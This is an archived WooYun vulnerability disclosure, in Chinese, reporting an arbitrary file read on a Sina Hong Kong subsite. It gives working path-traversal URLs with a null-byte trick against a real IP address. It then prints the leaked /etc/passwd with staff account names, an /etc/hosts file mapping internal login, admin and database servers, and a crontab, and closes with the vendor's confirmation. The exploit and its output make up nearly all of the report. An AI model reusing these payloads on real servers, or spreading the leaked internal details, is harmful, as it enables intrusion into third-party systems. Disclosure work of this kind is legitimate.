乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-24: 细节已通知厂商并且等待厂商处理中 2015-06-24: 厂商已经确认,细节仅向厂商公开 2015-07-04: 细节向核心白帽子及相关领域专家公开 2015-07-14: 细节向普通白帽子公开 2015-07-24: 细节向实习白帽子公开 2015-08-08: 细节向公众公开
新浪某分站任意文件读取漏洞
http://218.213.85.103/cgi-bin/api/sb/hottest_news.cgi?c=../../../../../../../../../../etc/passwd%00&_=1435037199895
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:999:999:Nobody:/:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinoprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinavahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologinmysql:x:1000:1000::/home/mysql:/sbin/nologinweb:x:99:99::/home/web:/bin/bashwww:x:80:99::/home/www:/sbin/nologinftp_sync:x:1201:99::/usr/home/ftp_sync:/bin/bashsinamgt:x:1202:99::/usr/home/sinamgt:/bin/bashszewai:x:1203:99::/home/szewai:/bin/bashjames:x:1204:99::/home/james:/bin/bashkenneth:x:1205:99::/home/kenneth:/bin/bashfaiho:x:1206:99::/home/faiho:/bin/bashice:x:1207:99::/home/ice:/bin/bashwinnie:x:1208:99::/home/winnie:/bin/bashkaden:x:1209:99::/home/kaden:/bin/bashnick:x:1210:99::/home/nick:/bin/bashryan:x:1211:99::/home/ryan:/bin/bashuuidd:x:101:158:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologinmy3310:x:1212:1000::/data2/mysql3310:/sbin/nologincouchbase:x:102:159:couchbase system user:/opt/couchbase:/bin/shapache:x:48:48:Apache:/var/www:/sbin/nologindistcache:x:94:94:Distcache:/:/sbin/nologinmemcached:x:103:160:Memcached daemon:/var/run/memcached:/sbin/nologintom:x:1213:99::/home/tom:/bin/bashjeremy:x:1214:99::/home/jeremy:/bin/bashheiyik:x:1215:99::/home/heiyik:/bin/bashnagios:x:1216:1216::/home/nagios:/sbin/nologin
http://218.213.85.103/cgi-bin/api/sb/hottest_news.cgi?c=../../../../../../../../../../etc/hosts%00&_=1435037199895
# Do not remove the following line, or various programs# that require network functionality will fail.127.0.0.1 sina235 localhost.localdomain localhost::1 localhost6.localdomain6 localhost610.254.254.139 archive10.254.254.183 system.sina.com.hk systemsnetmnt.sina.com.hk10.254.254.75 systems.internal.sina.com.hk# local platform # therefore we can use IP as domain#127.0.0.1 wbp.internal.sina.com.hk127.0.0.1 154.wbp.internal.sina.com.hk10.254.254.155 155.wbp.internal.sina.com.hk127.0.0.1 sme.sina.com.hk proxysme.sina.com.hk127.0.0.1 soccer.sina.com.hk proxysoccer.sina.com.hk127.0.0.1 eladies.sina.com.hk proxyeladies.sina.com.hk127.0.0.1 travel.sina.com.hk proxytravel.sina.com.hk10.254.254.224 proxyeladiesps.sina.com.hk# slave server#10.254.254.224 web-2.eladies.sina.com.hk#10.254.254.224 web-2.travel.sina.com.hk#10.254.254.224 web-2.sme.sina.com.hk#10.254.254.224 web-2.sports.sina.com.hk#10.254.254.222 yum.sina.com.hk10.254.254.150 forum.eladies.hk10.254.254.150 forum.eladies.sina.com.hk10.254.254.76 www.eladies.hk10.254.254.76 eladies.hk# Channel10.254.254.173 digital.sina.com.hk10.254.254.173 travel.sina.com.hk10.254.254.141 ent.sina.com.hk10.254.254.148 game.sina.com.hk10.254.254.215 news.sina.com.hk10.254.254.136 eladies.sina.com.hk10.254.254.148 basketball.sina.com.hk10.254.254.127 finance.sina.com.hk10.254.254.74 dictionary.sina.com.hk10.254.254.135 sports.sina.com.hk10.254.254.234 tv.sina.com.hk# Common10.254.254.172 weather.sina.com.hk10.254.254.229 nw2.sina.com.hk10.254.254.80 simg.sina.com.hk10.254.254.182 img.sina.com.hk10.254.254.177 rs.sinahk.net10.254.254.175 rs2.sinahk.net10.254.254.43 tool.sina.com.hk10.254.254.43 tool43.sina.com.hk10.254.254.141 site.search.sina.com.hk#10.254.254.89 cap.internal.sina.com.hk10.254.254.80 contentpool.sina.com.hk10.254.254.181 gspsdb.sina.com.hk10.254.254.233 tvdat.sina.com.hk10.254.254.173 ads.sina.com.hk10.254.254.140 ads.sina.com.hk10.254.254.58 search.news.sina.com.hk10.254.254.94 login.sina.com.hk10.254.254.94 nz.sina.com.hk10.254.254.149 soccer.sina.com.hk10.254.254.141 ent.sina.com.hk10.254.254.114 cs.sina.com.hk10.254.254.183 pv.sina.com.hk10.254.254.178 slide.sina.com.hk10.254.254.178 admin.slide.sina.com.hk10.254.254.61 hps.sina.com.hk# System10.254.254.75 ps.hk.weibo.com10.254.254.75 admin.hk.weibo.com10.254.254.183 psauth.sina.com.hk# HK Weibo10.254.254.50 hk.weibo.com10.254.254.129 web-1.hk.weibo.com10.254.254.130 web-2.hk.weibo.com10.254.254.131 web-3.hk.weibo.com10.254.254.16 db-m.hk.weibo.com10.254.254.7 cron.hk.weibo.com10.254.254.49 api.hk.weibo.com#weibostatus10.254.254.153 wbp.internal.sina.com.hk
SHELL=/bin/bashPATH=/sbin:/bin:/usr/sbin:/usr/binMAILTO=rootHOME=/# run-parts01 * * * * root run-parts /etc/cron.hourly02 4 * * * root run-parts /etc/cron.daily22 4 * * 0 root run-parts /etc/cron.weekly42 4 1 * * root run-parts /etc/cron.monthly########################################################Duplicity Backup######################################################30 5 * * * root /bin/sh /etc/duplicity.sh########## Server setting #############@daily root /usr/bin/rdate -su stdtime.gov.hk25 11,16,21 * * mon-fri root /root/utility/update_useragent_exclude_list.sh######################################## Cleanup Session files37 * * * * web /home/sinanet/ent/bin/crontab/clean_session.pl1 4 * * * web find /home/sinanet/ent/temp/session/ps/* -amin +60 -exec rm -rf {} \;# Clean outdated cache pag1 3 * * * root perl /home/sinanet/ent/bin/ps/util/pcache.cgi > /dev/null 2>&1#################################################################################### eladies slave start##################################################################################### update nw_nclick and rsync the data file to master server2 * * * * web perl /home/sinanet/ladies/bin/crontab/update_nw_nclick_201107.pl5 * * * * web /usr/bin/rsync -avz /home/sinanet/ladies/data/nw/ 10.254.254.224::home_sinanet_eladies/data/nw/## weather*/3 * * * * web perl /home/sinanet/ladies/bin/crontab/weather_asjs.pl## Cleanup Session files37 * * * * web /home/sinanet/ladies/bin/crontab/clean_session.pl1 4 * * * web find /home/sinanet/ladies/temp/session/ps/* -amin +60 -exec rm -rf {} \;# Clean outdated cache pag1 3 * * * root perl /home/sinanet/ladies/bin/ps/util/pcache.cgi > /dev/null 2>&1#################################################################################### eladies slave end###################################################################################
安全过滤
危害等级:中
漏洞Rank:5
确认时间:2015-06-24 13:35
感谢关注新浪安全,安全问题修复中。
暂无